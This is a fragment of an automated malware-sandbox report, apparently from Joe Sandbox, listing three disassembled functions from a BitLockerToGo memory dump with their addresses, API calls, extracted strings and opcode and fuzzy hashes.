                                                                                                                                                          Function 004367AF Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 165memoryCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000002.00000002.2399853829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: AllocString
                                                                                                                                                          • String ID: 0$0$b$c$y$}
                                                                                                                                                          • API String ID: 2525500382-2751227332
                                                                                                                                                          • Opcode ID: bb8b5806c04763b47c3ab5a792d058afedefd6bca67dd728f44cdc8407738252
                                                                                                                                                          • Instruction ID: 821cf9130e8cd5f6ebb1de99dcc4691c8eaef027f498815a5d700e8551cc5c2a
                                                                                                                                                          • Opcode Fuzzy Hash: bb8b5806c04763b47c3ab5a792d058afedefd6bca67dd728f44cdc8407738252
                                                                                                                                                          • Instruction Fuzzy Hash: DC81E16010CBC0CEE7168B3884983167ED15B6621CF2886DDD4AA4F3D3C3ABD55BC766
                                                                                                                                                          Function 00431430 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 231COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000002.00000002.2399853829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: [fbY$_nkQ$kkUp
                                                                                                                                                          • API String ID: 0-3145123041
                                                                                                                                                          • Opcode ID: 57f64d875186bd8352f334b1d93851cbe806884a8da132c403b6ed4246dd0043
                                                                                                                                                          • Instruction ID: af3b9e1362d38e8e29a38f19127dd51eee7be2d5c57223e9247a5dcb9c366cf1
                                                                                                                                                          • Opcode Fuzzy Hash: 57f64d875186bd8352f334b1d93851cbe806884a8da132c403b6ed4246dd0043
                                                                                                                                                          • Instruction Fuzzy Hash: EF712771504B418BE332CF25C881B63BBE2AF66311F188A2ED5EB4B792D739B405CB55
                                                                                                                                                          Function 0043CE3B Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 106memoryCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • SysAllocString.OLEAUT32(73A371AF), ref: 0043CEB0
                                                                                                                                                          • SysAllocString.OLEAUT32(F3BFF1A3), ref: 0043CF95
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000002.00000002.2399853829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: AllocString
                                                                                                                                                          • String ID: !$s%u'
                                                                                                                                                          • API String ID: 2525500382-439224852
                                                                                                                                                          • Opcode ID: 7aa0a3e6246a502dca2869c8a1477f858b5ec105c237375db835c5495004350d
                                                                                                                                                          • Instruction ID: 751ce87b811b7694680259d72d00ac5741bc3653d925cc6629c8f6403113edbc
                                                                                                                                                          • Opcode Fuzzy Hash: 7aa0a3e6246a502dca2869c8a1477f858b5ec105c237375db835c5495004350d
                                                                                                                                                          • Instruction Fuzzy Hash: 0841D0762993419BD308CFA6D8D025FBBE3ABC5304F199D2DE1949B345CBB8C50A8B52